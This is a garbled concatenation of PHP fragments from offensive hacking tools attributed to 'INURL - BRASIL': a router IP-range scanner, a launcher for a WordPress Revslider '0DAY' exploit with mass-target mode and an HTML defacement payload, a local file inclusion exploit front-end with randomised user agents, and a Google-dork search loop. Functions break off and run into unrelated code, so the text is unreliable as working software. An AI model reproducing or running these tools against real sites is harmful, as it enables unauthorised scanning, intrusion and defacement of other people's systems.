function main($params)
{
//IMPLEMENTATION HOME
echo __banner("{$_SESSION["c13"]}{$params['line']}{$_SESSION["c00"]}", 1);
echo "{$_SESSION["c01"]}Starting SCANNER RouterHunterBR 1.0 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c09"]}\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c00"]}\n\n";
if ($params['op'] == 0) {
//WORKING WITH IPS ON TRACK
for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) {
__plus();
__subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}");
__plus();
}
for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) {
__plus();
__subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}");
__plus();
}
for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) {
__plus();
__subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}");
__plus();
}
for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) {
__plus();
__subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}");
__plus();
}
} elseif ($params['op'] == 1) {
//WORKING WITH IP RANDOM
!not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL;
for ($i = 0; $i <= $params['limit-ip']; $i++) {
__subProcess($params, __getIPRandom());
__plus();
}
} elseif ($params['op'] == 2) {
//IP WORK SOURCE FILE
!is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL;
__plus();
foreach ($params['file'] as $value) {
__subProcess($params, $value);
__plus();
}
}
}
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\nhelp: --help\n\n";
$menu = "\n -t : SET TARGET.\n -f : SET FILE TARGETS.\n -p : SET PROXY\n Execute:\n php exploit.php -t target\n php exploit.php -f targets\n php exploit.php -t target -p 'http://localhost:9090'\n\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array('target' => not_isnull_empty($op_['t']) ? strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}" : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL, 'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by INURL - BRASIL ]<br><marque>blog.inurl.com.br<p style='color: transparent'>", 'line' => "--------------------------------------------------------------");
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __request($params) . exit : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit : NULL;
function not_isnull_empty($valor = NULL)
{
return !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
function __plus()
{
ob_flush();
flush();
}
function __listTarget($file)
{
$tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
# PLUS: http://google.com/+INURLBrasil
#
#===============================================================================
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
$op_ = getopt('t:c:', array('help::'));
echo " \n _____ \n (_____) ____ _ _ _ _ _____ _ ____ _ _ \n (() ()) |_ _| \\ | | | | | __ \\| | | _ \\ (_) |\n \\ / | | | \\| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| |\n \\ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | |\n /=\\ _| |_| |\\ | |__| | | \\ \\| |____ | |_) | | | (_| \\__ \\ | |\n [___] |_____|_| \\_|\\____/|_| \\_\\______| |____/|_| \\__,_|___/_|_| \n \n[1;37m0xNeither war between hackers, nor peace for the system.\n\n[+] [Exploit]: Local File Inclusion / INURL BRASIL\nhelp: --help[0m\n\n";
$menu = "\n -t : SET TARGET.\n -c : COUNT DIR.\n Execute:\n php lfiINURL.php -t target.br/index.file?= -c 50\n\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$config = array('target' => not_isnull_empty($op_['t']) ? strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}" : exit("[X] [ERRO] DEFINE TARGET\n"), 'count' => not_isnull_empty($op_['c']) ? $op_['c'] : exit("[X] [ERRO] DEFINE CONUNT\n"), 'dir' => "/", 'line' => "-----------------------------------------------------------------------------------\n");
function not_isnull_empty($valor = NULL)
{
return !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
function __plus()
{
ob_flush();
flush();
}
function __request_info($curl, $config)
{
curl_setopt($curl, CURLOPT_URL, $config['target'] . $config['file']);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
function __main($dork, $motor, $cod)
{
$dork_[0] = strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork);
$dork_[1] = not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0];
$dork_[2] = not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array();
$dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2])));
$file_proxy = not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL;
$list_proxy = is_array($file_proxy) ? $file_proxy : NULL;
print __bannerLogo();
__startingBanner();
for ($i = 0; $i <= count($dork_[3]); $i++) {
if (!empty($dork_[3][$i])) {
echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n";
//$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod);
//$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy);
__engines(urlencode($dork_[3][$i]), $list_proxy) . __plus();
$_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
$_SESSION["config"]["pr"] ? $_SESSION["config"]["totas_urls"] = NULL : NULL;
echo "\n";
}
}
!$_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
__exitProcess();
}
